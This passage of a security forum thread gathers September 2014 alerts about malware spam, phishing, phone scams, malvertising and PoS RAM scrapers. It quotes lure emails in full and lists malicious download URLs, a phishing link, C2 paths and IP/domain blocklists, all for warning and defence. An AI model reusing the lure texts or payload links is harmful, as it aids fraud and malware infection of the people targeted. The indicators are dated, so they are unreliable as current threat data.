- http://blog.dynamoo....ust-dhl-no.html
10 Sep 2014 - "Geir Myklebust is a real employee for DHL in Norway, but neither he nor DHL are responsible for this spam run in any way (their systems have NOT been breached either). Instead, it contains a malicious attachment and it should simply be deleted.
From:     Geir Myklebust (DHL NO) [Geir.Myklebust@ dhl .com]
Date:     10 September 2014 10:35
Subject:     FW: customer acct. no.: 4690086 - invoice 0257241 needs to be paid
Dear Sir.
The attached invoice from Villmarksmessen 2014 has still not been settled.
Please advise as soon as possible.
Thank you and regards,
Geir
Med vennlig hilsen/ Kind Regards
Geir Myklebust
Product Manager, Avd. Trade Fairs & Events
DHL Global Forwarding (Norway) AS
Avd. Trade Fairs & Events
Messeveien 14
2004 Lillestrøm ...


Attached is a ZIP file of various different names (e.g. invoice_0257241.zip), containing a malicious executable file invoice_3466198.exe which has a VirusTotal detection rate of 3/54*. The Comodo CAMAS report** shows an attempted connection to voladora .com/Imagenes/qaws.cab which is currently coming up with a socket error. I would recommend that you block access to that domain. Further analysis is pending..."
* https://www.virustot...sis/1410342283/

** http://camas.comodo....da704a26cac5038

"UPDATE: a second malicious binary is doing the round, this time with a detection rate of 2/53***..."
*** https://www.virustot...sis/1410353017/

92.43.17.6: https://www.virustot....6/information/

- http://myonlinesecur...ke-pdf-malware/
10 Sep 2014
- https://www.virustot...sis/1410350810/
___

Fake Overdue invoice SPAM – doc malware
- http://myonlinesecur...ke-doc-malware/
10 Sep 2014 - "'Overdue invoice #1197419584' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    Good afternoon,
    I was hoping to hear from you by now. May I have payment on invoice #1197419584 today please, or would you like a further extension?
    Best regards,
    Cherish Schaunaman
    +07540 61 15 69

... or like this one:
    This email contains an invoice file in attachment.

10 September 2014 : bill_2014-09-10_09-16-23_1197419584.arj :
Extracts to:  bill_2014-09-10_09-16-23_1197419584.exe
Current Virus total detections: 6/55*
Alternative version 10 September 2014 : Invoice4777_2C7.zip :
Extracts to: attachment_scaned.doc            .exe
Current Virus total detections: 2/54**
This 'Overdue invoice #1197419584' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper Microsoft word.doc file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1410342531/

** https://www.virustot...sis/1410341816/
___

'Outstanding Warrant' Phone SCAMS
- http://www.hoax-slay...one-scams.shtml
Sep 10, 2014 - "Scammers posing as law-enforcement officers are cold-calling people and tricking them into paying over the phone to resolve supposedly outstanding warrants. The scammers warn victims that, if they don't pay the requested fee, police may come to their home and arrest them... The scammers are reportedly quite skilled at impersonating police officers and are often able to convince victims that they are legitimate. When victims call back on the number provided, the scammers may identify their 'office' as a seemingly legitimate entity such as the 'County Warrants Department'. This simple -ruse- may further convince victims that the scammer's claims are true... This type of -scam- is certainly nothing new and has been around in various forms for many years... a flurry of reports from several US states suggests that these scammers are currently quite active. The scammers are also using variations of the old jury duty phone scam to steal money from victims. Police will -never- call you and demand an immediate payment to resolve an outstanding warrant. If you receive such a suspect call, do -not- give the caller any personal and financial information and do -not- comply with their instructions. If in doubt, call your local police to check. Do -not- use a phone number provided by the caller. Find a number for police in a local phone directory..."
___

Malvertisements - YouTube, Amazon and Yahoo
- http://www.computerw...-and-yahoo.html
Sep 9, 2014 - "Malicious advertisements have popped up on websites such as YouTube, Amazon and Yahoo, part of a sophisticated campaign to spread malware, Cisco said*... When encountered, the malicious advertisements cause the user to be -redirected- to a different website, which triggers a download based on whether the computer is running Windows or Apple's OS X... Cisco didn't identify the advertising network that is serving the malicious advertisements. Although ad networks try to filter out malicious ones, occasionally bad ones slip in, which for a high-traffic site means a large pool of potential victims...  Some of the malicious ads were served on youtube.com, amazon.com and ads.yahoo.com, Pelkmann wrote. All told, 74 domains were serving the ads. When a victim is -redirected- by one of the ads, the computer downloads a piece of malware with a unique checksum, making it harder for security software to detect. The download may also contain legitimate software such as a media player. To be infected, the user must be convinced to open the file. 'The attackers are purely relying on social engineering techniques in order to get the user to install the software package,' Pelkmann wrote. 'No drive-by exploits are being used thus far'..."
* http://blogs.cisco.c.../kyle-and-stan/
 

:ph34r:  :grrr:


Edited by AplusWebMaster, 10 September 2014 - 10:15 AM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#1276 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,071 posts

Posted 11 September 2014 - 06:49 AM

FYI...

Fake job offer SPAM - llcinc .net
- http://blog.dynamoo....-job-offer.html
11 Sep 2014 - "This -fake- company's name looks like it has been designed to be hard to find on Google. The so-called LLC INC using the domain llcinc .net does -not- exist.
    Date:      Wed, 10 Sep 2014 19:51:50 -0400 [09/10/14 19:51:50 EDT]
    From:      LLC INC
    Reply-To:      recruiter@ llcinc .net
    Subject:      EMPLOYMENT OFFER
    Hello,
      Good day to you overthere we will like to inform you that our company is currently
    opening an opportunity for employment if you are interested please do reply with your resume
    to recruiter@ llcinc .net
    Thanks
    Management LLC INC


This so-called job is going to be something like a money mule, parcel mule or some other illegal activity. The domain llcinc .net was registered just a few days ago with -fake- details... There is no website. The email originates from 209.169.222.37, the mail headers indicate that this is probably a compromised email server mail .swsymphony .org.
Avoid."
___

Fake eFax SPAM leads to Cryptowall
- http://blog.dynamoo....cryptowall.html
11 Sep 2014 - "Yet another -fake- eFax spam. I mean really I cannot remember the last time someone sent me a (real) fax...
From:     eFax [message@ inbound .efax .com]
Date:     11 September 2014 20:35
Subject:     eFax message from "unknown" - 1 page(s), Caller-ID: 1-865-537-8935
Fax Message [Caller-ID: 1-865-537-8935
You have received a 1 page fax at Fri, 12 Sep 2014 02:35:44 +0700.
* The reference number for this fax is atl_did1-1400166434-52051792384-154.
Click here to view this fax using your PDF reader.
Please visit www .eFax .com/en/efax/twa/page/help if you have any questions regarding this message or your service.
Thank you for using the eFax service! ...


... the link in the message goes somewhere bad, in this case it downloads a ZIP files from cybercity-game .com/game/Documents.zip which unzips to a malicious executable Documents.scr which has a pretty low VirusTotal detection rate of 2/55*. The ThreatTrack report** clearly identifies this as Cryptowall and identifies that it either downloads data from or posts data... The 111.exe has a much wider detection rate of 22/53*** and according the the ThreatTrack analysis of that binary there is some sort of network connection... I would recommend blocking the following:
188.165.204.210
193.19.184.20
193.169.86.151
goodbookideas .com
mtsvp .com
suspendedwar .com
"
* https://www.virustot...sis/1410467960/

** http://www.dynamoo.c...20a381ad91f.pdf

*** https://www.virustot...sis/1410468901/
___

Malicious WordPress injection sending to 178.62.254.78 and 176.58.100.98
- http://blog.dynamoo....on-sending.html
11 Seo 2014 - "There is currently some sort of injection attack against WordPress sites that is injected code into the site's .js files. Not so unusual.. except that the payload site in the file changes every half hour or so... The site mentioned in the IFRAME is the one that keeps -changing- so presumably there is either something running on the compromised WordPress site, or there is some other mechanism for the bad guys to update the details... All these subdomains are hijacked from legitimate domains using AFRAID .ORG nameservers, and are hosted on 178.62.254.78 (Digital Ocean, Netherlands). These then pass the victim onto another domain in the format... blocking the following IPs may give you better protection:
176.58.100.98
178.62.254.78
"

176.58.100.98: https://www.virustot...98/information/

178.62.254.78: https://www.virustot...78/information/
___

Fake Employee Important Address UPDATE/SPAM – PDF malware
- http://myonlinesecur...ke-pdf-malware/
11 Sep 2014 - "'To All Employee’s –  Important Address UPDATE' which pretends to come from Administrator at your own domain is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
     To All Employee’s:
    The end of the year is approaching and we want to ensure every employee receives their W-0 to the correct address. Verify that the address is correct – https://local.thespy...x?id=1206922112 If changes need to be made, contact HR .. Administrator ...


11 September 2014: Documents.zip: Extracts to: Documents.scr
Current Virus total detections: 0/53* ...  another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
*https://www.virustot...sis/1410456657/

- http://blog.dynamoo....nt-address.html
11 Sep 2014 - "This -fake- HR spam leads to a malicious ZIP file:
From:     Administrator [administrator@ victimdomain .com]
    Date:     11 September 2014 22:25
    Subject:     To All Employee's - Important Address UPDATE
    To All Employee's:The end of the year is approaching and we want to ensure every employee receives their W-5 to the correct address. Verify that the address is correct... If changes need to be made, contact HR...


The link in the email goes to the same site as described in this earlier post*, which means that the payload is Cryptowall."
* http://blog.dynamoo....cryptowall.html
___

Fake picture or video SPAM – jpg malware
- http://myonlinesecur...ke-jpg-malware/
11 Sep 2014 - "'A new picture or video' message pretending to come from getmyphoto@ vodafone .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The attachment file names are so far all the same and it extracts to a fake windows short cut file .pif Even setting show file extensions will, not show the .pif extension in windows 8  and the unzipped file will look like a genuine windows short cut, so you need to be especially wary and cautious. See below:
> http://myonlinesecur...not-showing.png
The email looks like:
    You have received a picture message from mobile phone number +447586595142 picture
    Please note, the free reply expires three days after the original message is sent from the Vodafone network. Vodafone Service


There is a second version of this email doing the rounds today. Instead of an attachment it has a link to a compromised/ infected/newly created malware pushing site where it automatically tries to download the malware in a zip file.
You have received a picture message from mobile phone number +447557523496 click here to view picture message
Please note, the free reply expires three days after the original message is sent from the Vodafone network. Vodafone Service


... there will be hundreds of different sites. The  zip was 90837744-2014_481427.zip which extracts to 90837744-2014_481427.scr which has the same #  and detection rate as the pif file earlier submitted to virus total*

11 September 2014: IMG_00005_09112014.jpeg.zip : Extracts to:    IMG_00005_09112014.jpeg.pif
Current Virus total detections:4/53** . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper jpg file instead of the .pif ( windows shortcut) file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1410430034/

** https://www.virustot...sis/1410427007/
___

Fake 'new order' SPAM – PDF malware
- http://myonlinesecur...ke-pdf-malware/
11 Sep 2014 - "'new order' pretending to come from random names at live .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email has various subjects, including new order, new invoice, FWD:invoice, FWD Order... The attachment file names are so far all the same and it extracts to a -fake- windows short cut file .pif . Even setting show file extensions will -not- show the .pif extension in windows 8  and the unzipped file will look like a genuine windows short cut, so you need to be especially wary and cautious. See below:
> http://myonlinesecur...not-showing.png
The email looks like:
Warmest regards,
> http://myonlinesecur...9/new-order.png


11 September 2014: 2014.09.11.zip : Extracts to:    2014.09.11.pdf.pif
Current Virus total detections: 4/53* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .pif ( windows shortcut) file it really is, so making it much more likely for you to accidentally open it and be infected... The basic rule is NEVER open any attachment to an email, unless you are expecting it... Never just blindly click on the file in your email..."
* https://www.virustot...sis/1410427007/
 

:ph34r:  :grrr:


Edited by AplusWebMaster, 11 September 2014 - 09:26 PM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#1277 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,071 posts

Posted 12 September 2014 - 04:03 AM

FYI...

Fake Invoice SPAM - contains malicious VBS script
- http://blog.mxlab.eu...ous-vbs-script/
Sep 12, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “[COPIE FACTURE SOCIETE LWS FC-408185] – [LWS INVOICE] 10/09/2014″. This email is sent from the spoofed address “Service clients LWS <noreply@ lws .com>” and has the following body:
S.A.R.L LWS
4, rue galvani
75838 PARIS Cedex 17
Paris le, 10/09/2014
Veuillez trouver en pièce jointe votre facture de référence: facture FC-408185 (Fichier: facture-408185) au format ZIP.
Si vous n’avez pas WinRar (Logiciel permettant de lire les fichiers ZIP) vous pouvez le télécharger ici:
http ://www .rarlab .com/download.htm
Merci pour la confiance que vous nous accordez,
Le service comptabilité LWS ...


The attached ZIP file has the name FACTURE_45871147.zip and contains the 4 kB large file FACTURE_45871147.vbs. the VBS script in fact is encoded to hide the real purpose but it seems that this script will download other malicious files and will install them on a system in order to infect the computer. The trojan is known as Trojan.Script.Crypt.deehcf or VBS/Dloadr-DVY. At the time of writing, 2 of the 53* AV engines did detect the trojan at Virus Total..."
* https://www.virustot...196a5/analysis/
___

Fake Household Improvement SPAM - Zbot Malware
- https://blog.malware...h-zbot-malware/
Sep 12, 2014 - "... malicious email in circulation at the moment which claims to contain an invoice from a Kitchen Appliance company. According to another recipient of the mail*, the named company is actually a real business entity although there’s no suggestion that they’ve been hacked or otherwise compromised – it seems the scammers just opened up a directory, said “That one” and just started pretending to be them. The mail reads as follows:
Screenshot: https://blog.malware...9/kitchens1.jpg
... The email comes with a .zip attachment, which contains a piece of Malware known as Zbot.  Zeus (aka Zbot) is something to be avoided, as it can lead to banking password theft, form grabbing, keystroke logging and also Ransomware. The zip contains an executable made to look like a Word .doc file, which is a trick as old as the hills yet extremely effective where catching people out is concerned. Telling Windows to display known file extensions will help to avoid this particular pitfall... we detect this as Trojan.Spy.Zbot, and the current Virus Total scores currently clock in at 29/54**...  there’s another mail*** doing the rounds which spoofs the same email address mentioned above, yet claims to be sent from a toiletries company. If you’ve bought any form of kitchen / household upgrade or addition recently and receive mails with zipped invoices, you may not recall exactly who you bought all of your items from. With that in mind, you may wish to have a look at your receipts and bank statements, and – on the off chance the randomly selected company named in the spam mails matches up – give them a call directly to confirm they really did send you something. There’s a good chance they probably didn’t..."
* http://myonlinesecur...rd-doc-malware/

** https://www.virustot...14f73/analysis/

*** http://blog.mxlab.eu...ontains-trojan/
___

Data Breaches and PoS RAM Scrapers
- http://blog.trendmic...s-ram-scrapers/
Sep 11, 2014 - "... Ever since the Target data breach came into the limelight, there has been a constant stream merchants/retailers publicly disclosing data breach incidents. These data breaches typically involve credit card data theft using PoS RAM scrapers. Early this month, Brian Krebs reported yet another big data breach that involves U.S. retailer Home Depot using a new variant of the BlackPOS PoS RAM scraper. Nearly all Home Depot locations in the US are believed to have been affected and it is speculated this data breach might surpass the Target breach in terms of volume of data stolen. In addition to an increased number of data breaches, 2014 also brings an increase in the number of new PoS RAM scraper families. Our PoS RAM scraper family tree illustrates the evolution as follows:
Evolution of the PoS RAM scraper family
> http://blog.trendmic...Figure-3-01.png
... Of the six new variants discovered in 2014, four were discovered between June and August.
- Soraya – discovered in June and is a Dexter- and ZeuS-inspired malware. In addition to scraping RAM for credit card Tracks 1 and 2 data, it borrows tricks from ZeuS for hooking the NtResumeThread API, and injects itself into all new processes. It also borrows ZeuS’s form-grabbing functionality and hooks the browser’s HTTP POST function. Trend Micro detects Soraya variants as TSPY_SORAYA.A.
- BrutPOS – discovered in July and appears to have borrowed functionality from a BlackPOS variant. It attempts to exploit PoS systems that use weak or default passwords and has open Remote Desktop Protocol (RDP) ports. BrutPOS will brute-force the login:password combinations to gain entry into the system. Trend Micro detects BrutPOS variants as TROJ_TIBRUN.B and TROJ_TIBRUN.SM.
- Backoff – discovered in July is a successor of Alina. It implements an updated data search function and drops a watchdog process that ensures Backoff is always running on the system. The cybercriminals use publicly available tools to brute-force entry into RDP applications on PoS systems and installs Backoff. Trend Micro detects Backoff variants as TSPY_POSLOGR.A, TSPY_POSLOGR.B, and TSPY_POSLOGR.C.
- BlackPOS ver 2.0 – discovered in August, clones the exfiltration technique that the BlackPOS variant used to compromise U.S. retailer Target. BlackPOS ver 2.0 also adds a unique feature where it pretends to be an AV product installed on the system to avoid drawing unwanted attention to itself. Reports indicate that this malware appears to have been used in the latest big data breach targeting Home Depot. Trend Micro detects BlackPOS ver 2.0 variants as TSPY_MEMLOG.A..."
 

:ph34r:  :grrr:


Edited by AplusWebMaster, 12 September 2014 - 09:41 AM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#1278 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,071 posts

Posted 14 September 2014 - 07:39 PM

FYI...

Phish - Paypal ...
- http://myonlinesecur...-hear-phishing/
14 Sep 2014 - "'Paypal Your account will be limited until we hear from you' pretending to come from service_paypal=cczazmam .com@ wpengine .com; on behalf of; service_paypal@ cczazmam .com. There are a few major common subjects in a phishing attempt. The majority are either PayPal or your Bank or Credit Card... The original email looks like this. It will NEVER be a genuine email from  PayPal or Your Bank so don’t ever follow the links in the email...
    PayPal account information :
    Hello,
    Dear PayPal user ,
    Your account will be limited if you not confirm it .
    Need Assistance?
    Some information on your account appears to be missing or incorrect.
    Please update your account promptly so that you can continue to enjoy
    all the benefits of your PayPal account.
    If you don’t update your account within 37 days, we’ll limit what you can do with your PayPal account.
    Please Login to confirm your information :
    http ://rangeviewrentals .com//wp-content/themes/twentytwelve/wester.html
    Reference Number: PP-003-211-347-423
    Yours sincerely,
    PayPal


This particular phishing campaign starts with an email with a link. In this case to a hacked compromised website, which looks nothing like any genuine PayPal page:
> http://myonlinesecur...ishing-scam.png
This one wants your personal details, your Paypal account log in details and your credit card and bank details and your email log in details . Many of them are also designed to specifically steal your facebook and other social network log in details..."
 

//


Edited by AplusWebMaster, 14 September 2014 - 07:40 PM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#1279 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,071 posts

Posted 15 September 2014 - 05:07 AM

FYI...

Fake Termination SPAM – malware
- http://myonlinesecur...lation-malware/
15 Sep 2014 - "There can’t be a much more alarming email to open first thing on a Monday Morning than one that pretends to say that you have been fired... 'Termination due to policy violation #33205939124' pretending to come from random names at random companies is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Today’s email template  attaches an arj file. This sort of compressed file is rarely used nowadays and many popular zip file programs will not automatically extract them. -Any- email received with an ARJ attachment should be immediately -deleted- . NO legitimate company or program ever uses that form of compression nowadays. To make it even harder to quickly detect, all the attachments are randomly named and extract to a different randomly named file and each one has a totally different SH1 or MD5#. Loads of slightly different subjects with this one, including
    Policy violation #59892665326
    Termination due to policy violation #33205939124
    Termination #59147901198
All the alleged infringements or violations have different numbers... The email looks like:
     Hello,
    We regret to inform you that your employment with A&M Defence & Marine Services Ltd is being terminated. Your termination is the result of the following violations of company policy:
    - 0A4 44 12.09.2011
    - 0A4 46 12.09.2011
    - 0A4 85 12.09.2011
     You were issued written warnings on 19.08.2014. As stated in your final warning, you needed to take steps to correct your behavior by 15.09.2014. Your failure to do so has resulted in your termination. To appeal this termination, you must return written notification of your intention to appeal to Wynona Kinnare in A&M Defence & Marine Services Ltd no later than 06:00PM on 21.09.2014.
     Sincerely,
    Pauletta Stephens ...


15 September 2014: disturbance_2014-09-15_08-38-12_33205939124.arj:
Extracts to:  disturbance_2014-09-15_08-38-12_33205939124.exe
Current Virus total detections: 3/53* . This  'Termination due to policy violation #33205939124' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...4c4ef/analysis/
... Behavioural information
TCP connections:
187.45.193.139: https://www.virustot...39/information/
213.186.33.87: https://www.virustot...87/information/
23.62.99.33: https://www.virustot...33/information/
66.96.147.117: https://www.virustot...17/information/
UDP communications:
137.170.185.211: https://www.virustot...11/information/
___

LinkedIn feature exposes Email Addresses
- http://krebsonsecuri...mail-addresses/
Sep 15, 2014 - "One of the risks of using social media networks is having information you intend to share with only a handful of friends be made available to everyone. Sometimes that over-sharing happens because friends betray your trust, but more worrisome are the cases in which a social media platform itself exposes your data in the name of marketing... According to researchers at the Seattle, Wash.-based firm Rhino Security Labs, at the crux of the issue is LinkedIn’s penchant for making sure you’re as connected as you possibly can be. When you sign up for a new account, for example, the service asks if you’d like to check your contacts lists at other online services (such as Gmail, Yahoo, Hotmail, etc.). The service does this so that you can connect with any email contacts that are already on LinkedIn, and so that LinkedIn can send invitations to your contacts who aren’t already users... Rhino Security founders Benjamin Caudill and Bryan Seely have a recent history of revealing how trust relationships between and among online services can be abused to expose or divert potentially sensitive information... In an email sent to this reporter last week, LinkedIn said it was planning at least two changes to the way its service handles user email addresses..."
(More at the krebsonsecurity URL above.)
___

Fake Overdue invoice SPAM - malicious .arj attachment  
- http://blog.dynamoo....0-spam-has.html
15 Sep 2014 - "This -fake- invoice email has a malicious attachment:
    From:     Mauro Reddin
    Date:     15 September 2014 10:32
    Subject:     Overdue invoice #6767390
    Morning,
    I was hoping to hear from you by now. May I have payment on invoice #84819995669 today please, or would you like a further extension?
    Best regards,
    Mauro Reddin ...


The attachment is an archive file invc_2014-09-15_15-07-11_6767390.arj so in order to get infected you would need an application capable of handling ARJ archives. Once unpacked, there is a malicious executable called invc_2014-09-15_15-07-11_88499270.exe which has a VirusTotal detection rate of just 1/55*... recommend that you apply the following blocklist (Long list at the dynamoo URL above.) ..."
* https://www.virustot...sis/1410773681/
___

Fake Sage 'Outdated Invoice' SPAM ...
- http://blog.dynamoo....ce-spam_15.html
15 Sep 2014 - "... another -fake- Sage email leading to malware:

Screenshot: http://4.bp.blogspot.../s1600/sage.png

... This ZIP file contains a malicious executable Invoice18642.scr which has a VirusTotal detection rate of just 1/55*. The ThreatTrack report... shows that it attempts to communicate with the following resources:
188.165.204.210/1509uk1/NODE01/0/51-SP3/0/
188.165.204.210/1509uk1/NODE01/1/0/0/
green-fuel .us/upload/box/1509uk1.ltc
www .green-fuel .us/upload/box/1509uk1.ltc
Recommended blocklist:
188.165.204.210
green-fuel .us
petitepanda .net
florensegoethe .com.br
coursstagephoto .com
vicklovesmila .com
flashsavant .com
"
* https://www.virustot...sis/1410779812/
___

Fake 'secure' NatWest SPAM – PDF malware
- http://myonlinesecur...ke-pdf-malware/
15 Sep 2014 - "'You have received a new secure message from NatWest' pretending to come from NatWest <secure@natwest.com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
[ NatWest logo ]
You have a new private message from NatWest
To view/read this your secure message please click here
Email Encryption Provided by NatWest. Learn More.
Email Security Powered by Voltage IBE
Copyright 2014 National Westminster Bank Plc. All rights reserved.
Footer Logo NatWest
To unsubscribe please click here ...

    
15 September 2014: SecureMessage.zip ( 8kb) : Extracts to:   SecureMessage.scr
Current Virus total detections: 1/55* . This 'You have received a new secure message from NatWest' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1410779812/

- http://threattrack.t...re-message-spam
Sep 15, 2014
Screenshot: https://gs1.wac.edge...Zu2c1r6pupn.png
___

Phish - LLoyds 'Secure' SPAM...
- http://myonlinesecur...ssage-phishing/
15 Sep 2014 - "There are a few major common subjects in a phishing attempt. The majority are either PayPal or your Bank or Credit Card, with a message saying some thing like:
- There have been unauthorised or suspicious attempts to log in to your account, please verify
- Your account has exceeded its limit and needs to be verified
- Your account will be suspended !
- You have received a secure message from < your bank>
- New Secure Message
- We are unable to verify your account information
- Update Personal Information
- Urgent Account Review Notification
- We recently noticed one or more attempts to log in to your PayPal account  from a foreign IP address
- Confirmation of Order
This one is 'LLoyds bank New Secure Message' pretending to come from Eli.Ray@ lloydsbank .com or David.Ricard@ lloydsbank .com... Email looks like:
[ Lloyds TSB logo ]     
    (New users may need to verify their email address)
    If you do not see or cannot click “Read Message” / click here
    Desktop Users:
    You will be prompted to open (view) the file or save (download) it to your computer. For best results, click Read Message button.
    Mobile Users:
    Install the mobile application.
    Protected by the Voltage SecureMail Cloud
    SecureMail has a NEW LOOK to better support mobile devices!
    Disclaimer: This email and any attachments are confidential and for the sole use of the recipients. If you have received this email in error please notify the sender...


Screenshot: http://myonlinesecur...ure_message.png

This one wants your personal details and bank details..."
___

Fake Fax SPAM - malware attachment
- http://myonlinesecur...ke-pdf-malware/
15 Sep 2014 - "'You have received a fax' pretending to come from fax .co.uk <fax@ documents55 .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    You have received a new fax. This fax was received by Fax Server.
    The fax has been downloaded to dropbox service (Google Inc).
    To view your fax message, please download from the link below. It’s
    operated by Dropbox and safety...
    Received Fax Details
    Received on:1 5/09/2014 10:14 AM
    Number of Pages: 1 ...


15 September 2014: Docs0972.zip ( 8kb): Extracts to:  Docs0972.scr
Current Virus total detections: 0/54* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1410804563/
___

Twitch users shook by money spending malware
- http://www.theinquir...pending-malware
15 Sep 2014 - "... F-Secure has warned gamers that the Twitch video streaming service has been hit with malware that can spend users' money. The firm revealed its concerns in a blog post on Friday*, shining a dark light on the new gaming console darling and its role in the world of Steam. F-Secure said that an alarmed Twitch user - not Amazon - approached it with some concerns, explaining that a lure in the Twitch chat feature offers access to a raffle. We all know what can and usually does follow the clicking an unsolicited link, and that is the start of a one-way trip to malware. This link, which purports to offer gaming gewgaws, is yet another lie, said F-Secure. It explained that a "Twitch-bot" account "bombards" the chat feature and tickles users with its lure..."
More detail here:
* http://www.f-secure....s/00002742.html

... and here:
- http://www.spywarein...steam-accounts/
 

:ph34r:  :grrr:


Edited by AplusWebMaster, 15 September 2014 - 03:39 PM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#1280 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,071 posts

Posted 16 September 2014 - 04:09 AM

FYI...

Fake 'Payments' SPAM ...
- http://blog.mxlab.eu...rding-payments/
Sep 16, 2014 - "...  intercepted different campaigns where the trojan Gen:Variant.Graftor.155439 is present in the attached ZIP archive. The trojan is known as Gen:Variant.Graftor.155439 by most AV engines but it’s also known as Trojan/Win32.Zbot, HW32.Paked.1F59, Generic-FAUS!BA7599C952BE or PE:Malware.XPACK-HIE/Heur!1.9C48. The first email comes with the subject “Re: today payment done” is sent from a spoofed address and has the following body:
    Dear sir,
    Today we have able to remit the total amount of US$ 51,704.97 to your account. Details of our payments are as follows:
    Cont. #41 SPV001/APR/13 US$34,299.13 – 11,748.82 (50% disc. For R008 & R016) =
    Cont. #42 EXSQI013/MAY/13 US$29,154.66
    Total Remittance: US$ 51,704.97
    Attached is the TT copy, check with your bank and let us know when you will proceed with shipment.
    Thank you very much.
    Best regards,
    Me


The attached ZIP file has the name swift copy.zip and contains the swift copy.scr file. At the time of writing, 11 of the 54 AV engines did detect the trojan at Virus Total*...
* https://www.virustot...6c686/analysis/
The second email comes with the subject “Re: Balance payment” is sent from a spoofed address and has the following body:
    The attached TT copy is issued at the request of our customer. The advice is for your reference only.
    Yours faithfully,
    Global Payments and Cash Management
    Bank of America (BOA)
    This is an auto-generated email, please DO NOT REPLY. Any replies to this
    email will be disregarded...


The attached ZIP file has the name original copy.zip and contains the original copy.scr file. At the time of writing, 12 of the 55 AV engines did detect the trojan at Virus Total**..."
** https://www.virustot...c1635/analysis/
___

Fake 'My new photo ;)' SPAM - malware attachment
- http://blog.mxlab.eu...zzor-2o-trojan/
Sep 16, 2014 - "... intercepted a new trojan variant distribution campaign by email with the subject “My new photo ;)”. This email is sent from a spoofed address and has the following short body in very poor English:
    my new photo ;)
    if you like my photo to send me u photo


The attached ZIP file has the name photo.zip, once extracted a folder photo is available with that contains the 127 kB large file photo.exe. The trojan is known as a variant of Trojan.Win32.Swizzor.2!O. At the time of writing, 1 of the 54 AV engines did detect the trojan at Virus Total*..."
* https://www.virustot...817cb/analysis/
... Behavioural information
TCP connections:
131.253.40.1: https://www.virustot....1/information/
137.254.60.32: https://www.virustot...32/information/
134.170.188.84: https://www.virustot...84/information/
157.56.121.21: https://www.virustot...21/information/
91.240.22.62: https://www.virustot...62/information/
___

Fake USPS SPAM - word doc malware
- http://myonlinesecur...rd-doc-malware/
16 Sep 2014 - "'USPS Postal Notification Service' pretending to come from USPS  is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecur...ion-service.png

16 September 2014: Label.zip ( 82 kb): Extracts to:  Label.exe             
Current Virus total detections: 20/54* . This USPS Postal Notification Service is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper Microsoft Word .doc file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1410841682/
___

Fake 'inovice' SPAM ...
- http://blog.dynamoo....ember-spam.html
16 Sep 2014 - "This spam mis-spells "invoice" in the subject line, and has an .arj file attached that contains a malicious binary.
Example subjects:
inovice 8958508 September
inovice 7682161 September
inovice 4868431 September
inovice 0293991 September
Body text:
This email contains an invoice file attachment


The name of the attachment varies, but is in the format invoice_8958508.arj which contains a malicious executable invoice_38898221_spt.exe which has a VirusTotal detection rate of just 3/54*. The ThreatTrack report...and Anubis report show a series a DGA domains... that are characteristic of Zbot, although none of these domains are currently resolving. If your organisation can -block-  .arj files at the mail perimeter then it is probably a good idea to do so."
